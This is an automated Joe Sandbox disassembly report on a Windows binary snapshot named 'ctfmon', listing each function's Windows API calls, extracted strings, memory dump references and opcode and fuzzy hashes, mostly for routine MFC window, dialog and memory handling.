VirtualAlloc.KERNEL32(00000000,00080000,00001000,00000004), ref: 00404182
Sleep.KERNEL32(00001388), ref: 004041B1
WaitForSingleObject.KERNEL32(00000344,00007530), ref: 0040422D
ResetEvent.KERNEL32(00000344), ref: 0040423A
SetEvent.KERNEL32(00000344), ref: 0040426F
Sleep.KERNEL32(000003E8), ref: 0040427A
CreateFileW.KERNEL32(0053CDF8,10000000,00000003,00000000,00000003,00000000,00000000), ref: 004042BB
CreateFileW.KERNEL32(0053CDF8,10000000,00000001,00000000,00000003,00000000,00000000), ref: 004042DC

Part of subcall function 00402F20: WaitForSingleObject.KERNEL32(00000348,000000FF,?,?,0053CB68,00403D13,?,00000049), ref: 00402F3E
Part of subcall function 00402F20: ResetEvent.KERNEL32(00000348,?,0053CB68,00403D13,?,00000049), ref: 00402F47
Part of subcall function 00402F20: SetEvent.KERNEL32(0000034C,?,0053CB68,00403D13,?,00000049), ref: 00402F77
Part of subcall function 00402F20: WaitForSingleObject.KERNEL32(0000034C,00000064,?,0053CB68,00403D13,?,00000049), ref: 00402F88
Part of subcall function 00402F20: Sleep.KERNEL32(0000000A,?,0053CB68,00403D13,?,00000049), ref: 00402F93
Part of subcall function 00402F20: SetEvent.KERNEL32(00000348,?,0053CB68,00403D13,?,00000049), ref: 00402F9E

SetEvent.KERNEL32(00000344), ref: 00404393
Sleep.KERNEL32(000003E8), ref: 0040439E
GetFileSize.KERNEL32(00000000,?), ref: 004043AF
SetFilePointer.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,0007A120,00000000), ref: 004043DE
ReadFile.KERNEL32(00000000,?,0007A120,?,00000000), ref: 004043F5
CloseHandle.KERNEL32(00000000), ref: 004043FC
SetEvent.KERNEL32 ref: 004044ED
Sleep.KERNEL32(000000C8,?,00000344), ref: 0040457D

Strings

+*&=^^^^--------DW+ER, xrefs: 0040430E
+*&=^^^^--------DW+FI, xrefs: 00404433
+*&=^^^^--------DWRST, xrefs: 004041DD

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Event$FileSleep$ObjectSingleWait$AllocCreateResetVirtual$CloseHandlePointerReadSize
String ID: +*&=^^^^--------DW+ER$+*&=^^^^--------DW+FI$+*&=^^^^--------DWRST
API String ID: 72173714-2046355071
Opcode ID: 03ec659664103a2cae5422131a5bfd8373ece3637d9f973c933879326cef5ca2
Instruction ID: 68a225615deaf7f64b5cd94b1301c96557090b2748eeb4ce9f12d3137a3e3624
Opcode Fuzzy Hash: 03ec659664103a2cae5422131a5bfd8373ece3637d9f973c933879326cef5ca2
Instruction Fuzzy Hash: C1C1AE71A04704AFD714DF24EC84A1BBBE5FBD8700F40492DFA45AB390DB78A909CBA5

Function 00421EF2 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00428C05: TlsGetValue.KERNEL32(00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000), ref: 00428C44

CallNextHookEx.USER32(?,00000003,?,?), ref: 00421F1F
GetWindowLongW.USER32(?,000000FC), ref: 00421F5E
GetPropW.USER32(?,AfxOldWndProc423), ref: 00421F72
SetPropW.USER32(?,AfxOldWndProc423,00000003), ref: 00421F81
GetPropW.USER32(?,AfxOldWndProc423), ref: 00421F89
GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 00421F95
SetWindowLongW.USER32(?,000000FC,Function_00021E76), ref: 00421FAF
CallNextHookEx.USER32(?,00000003,?,?), ref: 00421FBE
UnhookWindowsHookEx.USER32(?), ref: 00421FCF
GetWindowLongW.USER32(?,000000FC), ref: 0042203F
SetWindowLongW.USER32(?,000000FC,00000000), ref: 00422060
SetWindowLongW.USER32(?,000000FC,00000000), ref: 00422085

Strings

AfxOldWndProc423, xrefs: 00421F6B, 00421F70, 00421F7F, 00421F87, 00421F94
8qj, xrefs: 0042200D

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: LongWindow$HookProp$CallNext$AtomGlobalUnhookValueWindows
String ID: 8qj$AfxOldWndProc423
API String ID: 3289694481-3161831504
Opcode ID: 4f8fdded97969e7e628b20d6936dbd8aea49f7f8fcba6dacbe31f97343f7c436
Instruction ID: 3bbe1058c676c252dc3c84ad706e6ee6a953ffd8e3112ba2f7a94efb76d52b7d
Opcode Fuzzy Hash: 4f8fdded97969e7e628b20d6936dbd8aea49f7f8fcba6dacbe31f97343f7c436
Instruction Fuzzy Hash: B3518131700124EBCB219F65ED88BAE7B74FF19750F61816AFD159A2A1C7788A01CB98

Function 004238E8 Relevance: 19.7, APIs: 13, Instructions: 174
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00424202: GetWindowLongW.USER32(?,000000F0), ref: 0042420E

GetParent.USER32(?), ref: 00423913
SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 00423936
GetWindowRect.USER32(?,?), ref: 0042394F
GetWindowLongW.USER32(00000000,000000F0), ref: 00423962
CopyRect.USER32(?,?), ref: 004239AF
CopyRect.USER32(?,?), ref: 004239B9
GetWindowRect.USER32(00000000,?), ref: 004239C2

Part of subcall function 00405B9B: MonitorFromWindow.USER32(?,?), ref: 00405BB0

Part of subcall function 00405C06: GetMonitorInfoW.USER32(?,?), ref: 00405C1D

CopyRect.USER32(?,?), ref: 004239DE

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: RectWindow$Copy$LongMonitor$FromInfoMessageParentSend
String ID:
API String ID: 1450647913-0
Opcode ID: 15dfc4db7a0cb69fc378f0b22d4e2ecb498fe7f2055ab953c55b9b74ad9f47fe
Instruction ID: ccb8daffb7cbfa52e4fbfdfbb8d48ca0ec0013079dd18dece64f2212521eac76
Opcode Fuzzy Hash: 15dfc4db7a0cb69fc378f0b22d4e2ecb498fe7f2055ab953c55b9b74ad9f47fe
Instruction Fuzzy Hash: 9151A671B00229AFDB10DFA8EC85EEEB7B9AF44314F544166F501F3280D678EE458B58

Function 0042102B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00421030
GetSystemMetrics.USER32(0000002A), ref: 004210E2
GlobalLock.KERNEL32(?), ref: 0042116C
CreateDialogIndirectParamW.USER32(?,?,?,Function_00020E73,00000000), ref: 0042119E

Part of subcall function 00424739: InterlockedDecrement.KERNEL32(?), ref: 0042474D

DestroyWindow.USER32(00000000,?,?,00000000,?,?), ref: 00421215
GlobalUnlock.KERNEL32(?), ref: 00421226
GlobalFree.KERNEL32(?), ref: 0042122F

Strings

Helv, xrefs: 00421116
MS Sans Serif, xrefs: 00421103
MS Shell Dlg, xrefs: 004210F0

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Global$CreateDecrementDestroyDialogFreeH_prologIndirectInterlockedLockMetricsParamSystemUnlockWindow
String ID: Helv$MS Sans Serif$MS Shell Dlg
API String ID: 2343056566-2894235370
Opcode ID: 55db1a83fbba52e5acfeb541132f7c990a34733976cc85534da73b1da14e8790
Instruction ID: 7206d5c3c7dbf20e32f5d3ed2ca5f4a347ebefc87342b6247bb12fda8d74ee15
Opcode Fuzzy Hash: 55db1a83fbba52e5acfeb541132f7c990a34733976cc85534da73b1da14e8790
Instruction Fuzzy Hash: D7619471B00269DFCF10DFA4E8859BEBBB1BF18304F60046FF501A22A1D7785A51CB59

Function 00421D17 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00421D1C
GetPropW.USER32(?,AfxOldWndProc423), ref: 00421D34
CallWindowProcW.USER32(?,?,00000110,?,00000000), ref: 00421D92

Part of subcall function 00421924: GetWindowRect.USER32(?,00421B1C), ref: 00421949
Part of subcall function 00421924: GetWindow.USER32(?,00000004), ref: 00421966

SetWindowLongW.USER32(?,000000FC,?), ref: 00421DC2
RemovePropW.USER32(?,AfxOldWndProc423), ref: 00421DCA
GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 00421DD1
GlobalDeleteAtom.KERNEL32(00000000), ref: 00421DD8

Part of subcall function 00421901: GetWindowRect.USER32(?,?), ref: 0042190D

CallWindowProcW.USER32(?,?,?,?,00000000), ref: 00421E2C

Strings

AfxOldWndProc423, xrefs: 00421D2A, 00421D32, 00421DC8, 00421DD0

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
String ID: AfxOldWndProc423
API String ID: 2397448395-1060338832
Opcode ID: f1274f229b79a40cf399756ccfc4787f1cda9d8cf99687d665b758292b2d2fba
Instruction ID: ee617ac9c7a8cbdd772955139c2c3f47372abafb9f4b2e415b0651597c7a1178
Opcode Fuzzy Hash: f1274f229b79a40cf399756ccfc4787f1cda9d8cf99687d665b758292b2d2fba
Instruction Fuzzy Hash: 1831A572A0012ABBCF119FE5ED49DFF7B78EF55311F40042AF901A2160C7394A21D7A9

Function 0042889E Relevance: 15.1, APIs: 10, Instructions: 99
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(0000001C,0053EDA8,00000000,?,00000000,00000000,00428C39,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000), ref: 004288AD
GlobalAlloc.KERNEL32(00002002,?,?,?,00000000,00000000,00428C39,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000), ref: 00428902
GlobalHandle.KERNEL32(?), ref: 0042890B
GlobalUnlock.KERNEL32(00000000), ref: 00428914
GlobalReAlloc.KERNEL32(00000000,?,00002002), ref: 00428926
GlobalHandle.KERNEL32(?), ref: 0042893D
GlobalLock.KERNEL32(00000000), ref: 00428944
LeaveCriticalSection.KERNEL32(0040D108,?,?,00000000,00000000,00428C39,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000), ref: 0042894A
GlobalLock.KERNEL32(00000000), ref: 00428959
LeaveCriticalSection.KERNEL32(?), ref: 004289A2

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID:
API String ID: 2667261700-0
Opcode ID: 94baa74e74d1816e201a8b95c87ab1cee1c36e3339597553a40441d4cb95e4e8
Instruction ID: 271864d7abaf63b675c0f0faa4b004931e40b10b77f41b95d7dd058722d16705
Opcode Fuzzy Hash: 94baa74e74d1816e201a8b95c87ab1cee1c36e3339597553a40441d4cb95e4e8
Instruction Fuzzy Hash: 1E318EB17007099FD7249F28EC89A2EB7E9FF44304B440A2EF952C3661EB75E855CB54

Function 00423C3C Relevance: 10.6, APIs: 7, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetParent.USER32(?), ref: 00423C70
PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00423C99
UpdateWindow.USER32(?), ref: 00423CB5
SendMessageW.USER32(?,00000121,00000000,?), ref: 00423CDB
SendMessageW.USER32(?,0000036A,00000000,00000001), ref: 00423CFA
UpdateWindow.USER32(?), ref: 00423D3D
PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00423D70

Part of subcall function 00424202: GetWindowLongW.USER32(?,000000F0), ref: 0042420E

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 695136d32d4e6256ec9fe47706e3780479ec0c08abf10bb3384cb61ea45ff5e8
Instruction ID: 2835e03b91a28ba3af01524857fe71f7bc2e9977fd44adc23a2fdb3f1163188a
Opcode Fuzzy Hash: 695136d32d4e6256ec9fe47706e3780479ec0c08abf10bb3384cb61ea45ff5e8
Instruction Fuzzy Hash: BE418F307047519BD731DF26A848A2BBBF8EFC4B46F90091EF48196251C77DDA05CA9A

Function 00401240 Relevance: 9.1, APIs: 6, Instructions: 91
windowthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMenu.USER32(?,00000000,?,?,?,?,0042AFB8,000000FF), ref: 00401265
AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 004012B3
AppendMenuW.USER32(?,00000000,00000010,?), ref: 004012C2
SendMessageW.USER32(?,00000080,00000001,?), ref: 004012EB
SendMessageW.USER32(?,00000080,00000000,?), ref: 004012FC
CreateThread.KERNEL32(00000000,00000000,Function_000014B0,00000000,00000000,00000000), ref: 0040133B

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Menu$AppendMessageSend$CreateSystemThread
String ID:
API String ID: 74173811-0
Opcode ID: d8992fad20af1a923786e3dc5bba175c898580a51614293c88c1d127db3c23c6
Instruction ID: 1d9806d43d84ee879c0bed757a7013bebe0408e528fbc722d7d59c404b59acd4
Opcode Fuzzy Hash: d8992fad20af1a923786e3dc5bba175c898580a51614293c88c1d127db3c23c6
Instruction Fuzzy Hash: E0215375340700BBE230DB55DC82F1AF7A4EB84B10F508A1EB6556B2D0CAB8F8058B59

Function 00424D98 Relevance: 9.0, APIs: 6, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(0000000B), ref: 00424DA5
GetSystemMetrics.USER32(0000000C), ref: 00424DAC
GetDC.USER32(00000000), ref: 00424DC5
GetDeviceCaps.GDI32(00000000,00000058), ref: 00424DD6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00424DDE
ReleaseDC.USER32(00000000,00000000), ref: 00424DE6

Part of subcall function 00428FF4: GetSystemMetrics.USER32(00000002), ref: 00429006
Part of subcall function 00428FF4: GetSystemMetrics.USER32(00000003), ref: 00429010

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
String ID:
API String ID: 1031845853-0
Opcode ID: 1b7e95f1daaaf1ad890cb9b11a4611629987d7c9efd1284042aeb5d660bc9662
Instruction ID: 1a237f0f63429e1a6939c80a8fc9a6691efaff51cb6deb2a72a08bbb0bfadc6e
Opcode Fuzzy Hash: 1b7e95f1daaaf1ad890cb9b11a4611629987d7c9efd1284042aeb5d660bc9662
Instruction Fuzzy Hash: 8EF03670740710AEE2306B769C89F1B77A4EF90795F51452EE601572D0CAB898468AA9

Function 00428847 Relevance: 7.5, APIs: 5, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsFree.KERNEL32(00000000,?,?,00428D54,00000000,00000001), ref: 00428853
GlobalHandle.KERNEL32(?), ref: 0042887B
GlobalUnlock.KERNEL32(00000000), ref: 00428884
GlobalFree.KERNEL32(00000000), ref: 0042888B
DeleteCriticalSection.KERNEL32(-0000001C,?,?,00428D54,00000000,00000001), ref: 00428895

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Global$Free$CriticalDeleteHandleSectionUnlock
String ID:
API String ID: 2159622880-0
Opcode ID: 72abfe4615f1a0306001f0a3fcdde9ea638aa21f76941549bfc717915cfb7916
Instruction ID: 3d5d1d7ecfedab2d5cc22e9364798e3d77b8a9c8052dba26925915cdb0ff854d
Opcode Fuzzy Hash: 72abfe4615f1a0306001f0a3fcdde9ea638aa21f76941549bfc717915cfb7916
Instruction Fuzzy Hash: AFF09A357006209BC630AB69AC88A2F76A8AF847507C9056EF801D3261CF28DC028AA8

Function 004158E8 Relevance: 6.2, APIs: 4, Instructions: 241fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000001,80000000,?,0000000C,00000001,00000080,00000000,00000001,00000000,00000000), ref: 00415A9B
GetLastError.KERNEL32 ref: 00415AA7
GetFileType.KERNEL32(00000000), ref: 00415ABC
CloseHandle.KERNEL32(00000000), ref: 00415AC7

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastType
String ID:
API String ID: 1809617866-0
Opcode ID: 5d4f7fbcfd004d5c716192fc4465a7fbf99ed0a53b8472f6d4e6057b13717365
Instruction ID: aab0d4c648b5e97227a39ec10cf2ade21aae79614a35b9dda5638ec353018830
Opcode Fuzzy Hash: 5d4f7fbcfd004d5c716192fc4465a7fbf99ed0a53b8472f6d4e6057b13717365
Instruction Fuzzy Hash: 598149B1918A45DBEF204B68CC847EF7B60AF81364F24422BE561A73D1C7BC49C5875E

Function 00412AE6 Relevance: 6.2, APIs: 4, Instructions: 170fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000100,00000000,00000000), ref: 00412B60
GetLastError.KERNEL32 ref: 00412B6A
ReadFile.KERNEL32(?,?,00000001,00000000,00000000), ref: 00412C30
GetLastError.KERNEL32 ref: 00412C3A

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 6a45bc645ff46dfccc6dce71b6c10d23138b9b5d02a2b2b171ab11cb0922ce5a
Instruction ID: 7d164bf494c3a70b5ac177ea6f34f1a928856a788b915d1263595a35fc0a8096
Opcode Fuzzy Hash: 6a45bc645ff46dfccc6dce71b6c10d23138b9b5d02a2b2b171ab11cb0922ce5a
Instruction Fuzzy Hash: 3551E7346043859FDF218F98C9807EE7BB0AF12304F54409BE951DB351E3B899E6CB99

Function 00411C97 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

Part of subcall function 0041257D: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125BA
Part of subcall function 0041257D: EnterCriticalSection.KERNEL32(?,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125D5

InitializeCriticalSection.KERNEL32(00000068,00000100,00000080,?,00000000,00000000,00000000,00415A65,00000001,00000000,00000000), ref: 00411CEA
EnterCriticalSection.KERNEL32(00000068,00000100,00000080,?,00000000,00000000,00000000,00415A65,00000001,00000000,00000000), ref: 00411CFF
LeaveCriticalSection.KERNEL32(00000068,?,00000000,00000000,00000000,00415A65,00000001,00000000,00000000), ref: 00411D0C

Strings

, xrefs: 00411D40

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CriticalSection$EnterInitialize$Leave
String ID:
API String ID: 713024617-3916222277
Opcode ID: 1dc31ab478f0914f8f2649b55863778f4ed1d95d0d2dde45da4442d96100c209
Instruction ID: 13a2c4bc58f2d481d2e4a9d701e6eaf19ac6520ffe26352c078445bd6550f82f
Opcode Fuzzy Hash: 1dc31ab478f0914f8f2649b55863778f4ed1d95d0d2dde45da4442d96100c209
Instruction Fuzzy Hash: BF3139725053019FD3148F20ECC47EA77E5EB41338F248A2EE6668B2E1D7B4A8C88759

Function 00428FD4 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,?,?,00428FCF), ref: 0042904B
GetProcessVersion.KERNEL32(00000000,?,?,?,00428FCF), ref: 00429088
LoadCursorW.USER32(00000000,00007F02), ref: 004290B6
LoadCursorW.USER32(00000000,00007F00), ref: 004290C1

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

